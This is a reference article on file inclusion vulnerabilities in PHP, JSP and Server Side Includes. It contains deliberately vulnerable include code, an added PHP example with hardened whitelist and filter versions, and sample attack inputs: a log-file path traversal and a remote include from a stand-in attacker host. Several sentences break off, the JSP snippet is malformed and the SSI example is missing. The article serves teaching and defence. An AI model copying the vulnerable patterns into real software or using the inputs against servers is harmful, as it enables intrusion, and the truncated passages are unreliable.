File inclusion vulnerability

Definition
A file inclusion vulnerability is a type of web vulnerability that most commonly affects web applications that rely on a scripting runtime. The issue arises when an application builds a path to executable code from an attacker-controlled variable in a way that lets the attacker choose which file is executed at runtime. A file inclusion vulnerability is distinct from a generic directory traversal attack: directory traversal is a way of gaining unauthorized file system access, whereas a file inclusion vulnerability subverts how an application loads code for execution. Successful exploitation of a file inclusion vulnerability typically results in remote code execution on the web server that runs the affected web application.

Types of inclusion

Remote file inclusion

Remote file inclusion (RFI) occurs when the web application downloads and executes a remote file. These remote files are usually specified as an HTTP or FTP URI in a user-supplied parameter to the web application.

Local file inclusion

Local file inclusion (LFI) is similar to remote file inclusion except that, instead of remote files, only local files (files already present on the server) can be included for execution. This can still lead to remote code execution by including a file that contains attacker-controlled data, such as the web server's access logs.

Programming languages

PHP

In PHP the main cause is the use of unvalidated user input with a filesystem function that includes a file for execution. Most notable are the

Example

Consider this PHP script, which includes a file specified by the request:

    <?php
    // Deliberately vulnerable: the request parameter is concatenated straight
    // into the include path, so the client chooses which file is executed.
    if ( isset( $_GET['language'] ) ) {
        include( $_GET['language'] . '.php' );
    }
    ?>

The developer intended to read in
The best solution in this case is to use a whitelist of accepted language parameters. If a strong method of input validation such as a whitelist cannot be used, then rely on input filtering or validation of the passed-in path to make sure it does not contain unintended characters or character patterns. However, this requires anticipating every problematic character combination, which is error-prone. A safer solution is a predefined switch/case statement that selects which file to include, rather than using a URL or form parameter to build the path dynamically.

JavaServer Pages (JSP)

JavaServer Pages (JSP) is a server-side scripting technology that can include files for execution at runtime.

Example

The following script is vulnerable to a file inclusion vulnerability:

    <%-- Deliberately vulnerable: the "p" parameter is concatenated straight into the include path --%>
    <% String p = request.getParameter("p"); %>
    @include file="<%="includes/" + p + ".jsp"%>" %>
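The PHP loader from the example above, placed beside the two hardened forms this section recommends (a whitelist lookup and a switch/case) and the weaker character filter for cases where no whitelist is possible. This is an added example and not code from the original article; the lang/ file names, the function names and the sample inputs are hypothetical and constructed for the illustration.

```php
<?php
// Added example, not from the original article. Function names and the
// files under lang/ are hypothetical.
declare(strict_types=1);

// 1. Vulnerable (as in the article): the request value becomes the include path.
//    ?language=../../../../var/log/apache2/access.log  -> local file inclusion
//    ?language=http://attacker.example/shell           -> remote file inclusion
//                                                          (needs allow_url_include=On)
function load_language_vulnerable(array $get): void
{
    if (isset($get['language'])) {
        include($get['language'] . '.php');
    }
}

// 2. Whitelist: the request value is only ever a key into a fixed map, so the
//    path that reaches include() never contains attacker-supplied bytes.
const LANGUAGE_FILES = [
    'en' => __DIR__ . '/lang/english.php',
    'fr' => __DIR__ . '/lang/french.php',
];

function language_file(mixed $language): ?string
{
    // Non-string values (e.g. ?language[]=x) and unknown keys are rejected;
    // "en\0", "../fr" or a URL are simply not keys of the map.
    if (!is_string($language) || !array_key_exists($language, LANGUAGE_FILES)) {
        return null;
    }
    return LANGUAGE_FILES[$language];
}

function load_language_whitelist(array $get): bool
{
    $file = language_file($get['language'] ?? null);
    if ($file === null) {
        return false;           // caller answers 400 or falls back to a default
    }
    include $file;
    return true;
}

// 3. switch/case: same idea, every branch names a constant file.
function load_language_switch(string $language): void
{
    switch ($language) {
        case 'fr':
            include __DIR__ . '/lang/french.php';
            break;
        case 'en':
        default:
            include __DIR__ . '/lang/english.php';
            break;
    }
}

// 4. Fallback filter for when no whitelist is possible: accept only a short
//    alphanumeric token, which excludes path separators, "..", URL schemes
//    and NUL bytes (older PHP versions silently truncated filesystem paths
//    at a NUL byte, see reference 5).
function is_safe_include_name(mixed $name): bool
{
    return is_string($name)
        && strlen($name) <= 32
        && preg_match('/\A[A-Za-z0-9_]+\z/', $name) === 1;
}

// Constructed sample inputs: only the first two pass the filter.
$samples = [
    'english',
    'de_DE',
    '../../../../var/log/apache2/access.log',
    "english\0",
    'http://attacker.example/shell',
];
foreach ($samples as $s) {
    printf("%-45s %s\n", addcslashes($s, "\0"), is_safe_include_name($s) ? 'accept' : 'reject');
}
```

The whitelist and switch/case forms also close the remote inclusion path, because no URL can ever reach include(). As defence in depth in PHP, keep the allow_url_include directive disabled in php.ini (references 1 and 2), since include() will only fetch http:// or ftp:// targets when it is on.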
Server Side Includes (SSI)

Server Side Includes are uncommon and are not typically enabled on a default web server. A server-side include can be used to gain remote code execution on a vulnerable web server.[6]

Example

The following code is vulnerable to a remote-file inclusion vulnerability:

The above code is not an XSS vulnerability; rather, it includes a new file to be executed by the server.
References

1. "Using remote files". PHP. http://www.php.net/manual/en/features.remote-files.php. Accessed March 3, 2013.
2. "List of php.ini directives". PHP. http://php.net/manual/en/ini.list.php. Accessed October 21, 2016.
3. "Remote File Inclusion". The Web Application Security Consortium. http://projects.webappsec.org/Remote-File-Inclusion. Accessed March 3, 2013.
4. "CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')". Common Weakness Enumeration (CWE), MITRE. http://cwe.mitre.org/data/definitions/98.html. Accessed March 3, 2013.
5. "PHP :: Request #39863 :: file_exists() silently truncates after a null byte". bugs.php.net. https://bugs.php.net/bug.php?id=39863. Accessed October 21, 2016.
6. "Apache httpd Tutorial: Introduction to Server Side Includes - Apache HTTP Server Version 2.4". httpd.apache.org. http://httpd.apache.org/docs/current/howto/ssi.html#exec. Accessed October 21, 2016.